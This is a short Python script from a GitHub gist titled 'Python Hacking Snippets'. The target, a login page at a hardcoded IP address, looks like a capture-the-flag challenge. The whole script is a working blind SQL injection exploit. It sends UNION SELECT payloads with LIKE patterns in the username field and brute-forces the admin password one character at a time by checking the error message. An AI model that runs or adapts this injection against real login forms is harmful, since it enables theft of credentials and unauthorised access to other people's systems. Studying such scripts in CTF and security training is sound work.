# !/usr/bin/python3
import requests
import timeit
start = timeit.default_timer()
URL = "http://35.227.24.107:5001/b3838cbb72/login"
QUERY = "admin' union select password from admins where id=1 and password like \""
CHARS = ["a","b","c", "d", "e", "f", "g" , "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", \
"u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
def send(name):
data = {'username':name, 'password':'thisIs'}
r = requests.post(URL, data )
return r
def check(value):
if 'Invalid password' in value.text:
return True
else:
return False
print("Start Bruteforcing Parameter")
word = ""
restart = True
while restart:
lc = 0
for i in CHARS:
q = QUERY + word + i + "%\";--"
r = send(q)
if check(r):
word = word + i
break
if i == CHARS[-1]:
lc +=1
if lc == 1:
restart = False
break
stop = timeit.default_timer()
print("Found: "+ word)
time = stop - start
print('Time %.2f seconds' % time) 
Last active
March 14, 2019 18:16
-
-
Save AvasDream/96ff401a6439bc44e5326841f0b934ae to your computer and use it in GitHub Desktop.
Python Hacking Snippets
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment